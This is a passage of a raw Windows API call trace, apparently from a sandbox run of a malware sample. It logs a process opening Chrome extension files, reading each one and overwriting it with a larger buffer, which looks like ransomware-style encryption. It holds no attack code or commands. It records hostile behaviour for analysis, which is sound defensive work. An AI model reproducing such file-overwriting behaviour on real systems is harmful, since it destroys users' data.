lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0147.969] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1c2 [0147.969] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0147.969] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0147.969] ReleaseMutex (hMutex=0x168) returned 1 [0147.969] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.969] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0147.969] ReadFile (in: hFile=0x1dc, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1c2, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x2b1f2bc*=0x1c2, lpOverlapped=0x0) returned 1 [0147.971] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0147.971] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x74a, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x2b1f2d0*=0x74a, lpOverlapped=0x0) returned 1 [0147.971] CloseHandle (hObject=0x1dc) returned 1 [0147.971] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0147.972] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0147.972] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xb1 [0147.972] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0147.972] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0147.972] ReleaseMutex (hMutex=0x168) returned 1 [0147.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0147.973] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f35ad8, nNumberOfBytesToRead=0xb1, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f35ad8*, lpNumberOfBytesRead=0x2b1f2bc*=0xb1, lpOverlapped=0x0) returned 1 [0147.974] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0147.974] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x639, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x639, lpOverlapped=0x0) returned 1 [0147.974] CloseHandle (hObject=0x1dc) returned 1 [0147.974] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0147.975] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0147.976] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xc5 [0147.976] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0147.976] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0147.976] ReleaseMutex (hMutex=0x168) returned 1 [0147.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0147.976] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ed5e38, nNumberOfBytesToRead=0xc5, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed5e38*, lpNumberOfBytesRead=0x2b1f2bc*=0xc5, lpOverlapped=0x0) returned 1 [0147.977] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0147.977] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x64d, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x64d, lpOverlapped=0x0) returned 1 [0147.978] CloseHandle (hObject=0x1dc) returned 1 [0147.978] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0147.979] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0147.979] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xcd [0147.979] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0147.979] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0147.979] ReleaseMutex (hMutex=0x168) returned 1 [0147.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0147.979] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ed5e38, nNumberOfBytesToRead=0xcd, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed5e38*, lpNumberOfBytesRead=0x2b1f2bc*=0xcd, lpOverlapped=0x0) returned 1 [0147.981] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0147.981] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x655, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x655, lpOverlapped=0x0) returned 1 [0147.981] CloseHandle (hObject=0x1dc) returned 1 [0147.981] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0147.982] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0147.982] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xaf3 [0147.982] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0147.982] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0147.982] ReleaseMutex (hMutex=0x168) returned 1 [0147.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="computed_hashes.json", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0147.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="computed_hashes.json", cchWideChar=20, lpMultiByteStr=0x1f88c44, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="computed_hashes.json", lpUsedDefaultChar=0x0) returned 20 [0147.982] ReadFile (in: hFile=0x1dc, lpBuffer=0x2870f88, nNumberOfBytesToRead=0xaf3, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesRead=0x2b1f2bc*=0xaf3, lpOverlapped=0x0) returned 1 [0148.728] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0148.728] WriteFile (in: hFile=0x1dc, lpBuffer=0x2870fb8*, nNumberOfBytesToWrite=0x107b, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870fb8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x107b, lpOverlapped=0x0) returned 1 [0148.729] CloseHandle (hObject=0x1dc) returned 1 [0148.729] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0149.134] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0149.135] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x22c [0149.135] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0149.135] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.135] ReleaseMutex (hMutex=0x168) returned 1 [0149.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="icon_16.png", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0149.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="icon_16.png", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icon_16.png", lpUsedDefaultChar=0x0) returned 11 [0149.135] ReadFile (in: hFile=0x1d4, lpBuffer=0x1f25a38, nNumberOfBytesToRead=0x22c, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f25a38*, lpNumberOfBytesRead=0x2b1f2bc*=0x22c, lpOverlapped=0x0) returned 1 [0149.136] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0149.136] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x7b4, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x2b1f2d0*=0x7b4, lpOverlapped=0x0) returned 1 [0149.136] CloseHandle (hObject=0x1d4) returned 1 [0149.137] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0149.137] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0149.137] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x2c1 [0149.138] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0149.138] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.138] ReleaseMutex (hMutex=0x168) returned 1 [0149.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0149.140] ReadFile (in: hFile=0x1d4, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x2c1, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x2b1f2bc*=0x2c1, lpOverlapped=0x0) returned 1 [0149.181] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0149.181] WriteFile (in: hFile=0x1d4, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x849, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x2b1f2d0*=0x849, lpOverlapped=0x0) returned 1 [0149.181] CloseHandle (hObject=0x1d4) returned 1 [0149.182] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0149.182] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0149.183] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x29b [0149.183] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0149.183] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.183] ReleaseMutex (hMutex=0x168) returned 1 [0149.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0149.183] ReadFile (in: hFile=0x1d4, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x29b, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x2b1f2bc*=0x29b, lpOverlapped=0x0) returned 1 [0149.185] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0149.185] WriteFile (in: hFile=0x1d4, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x823, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x2b1f2d0*=0x823, lpOverlapped=0x0) returned 1 [0149.185] CloseHandle (hObject=0x1d4) returned 1 [0149.185] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0149.186] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0149.186] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x269 [0149.186] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0149.186] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.186] ReleaseMutex (hMutex=0x168) returned 1 [0149.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0149.187] ReadFile (in: hFile=0x1d4, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x269, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x2b1f2bc*=0x269, lpOverlapped=0x0) returned 1 [0149.188] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0149.188] WriteFile (in: hFile=0x1d4, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x7f1, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x2b1f2d0*=0x7f1, lpOverlapped=0x0) returned 1 [0149.188] CloseHandle (hObject=0x1d4) returned 1 [0149.189] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0149.189] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0149.189] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x29a [0149.189] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0149.190] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.190] ReleaseMutex (hMutex=0x168) returned 1 [0149.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0149.190] ReadFile (in: hFile=0x1d4, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x29a, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x2b1f2bc*=0x29a, lpOverlapped=0x0) returned 1 [0149.306] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0149.306] WriteFile (in: hFile=0x1d4, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x822, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x2b1f2d0*=0x822, lpOverlapped=0x0) returned 1 [0149.307] CloseHandle (hObject=0x1d4) returned 1 [0149.307] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 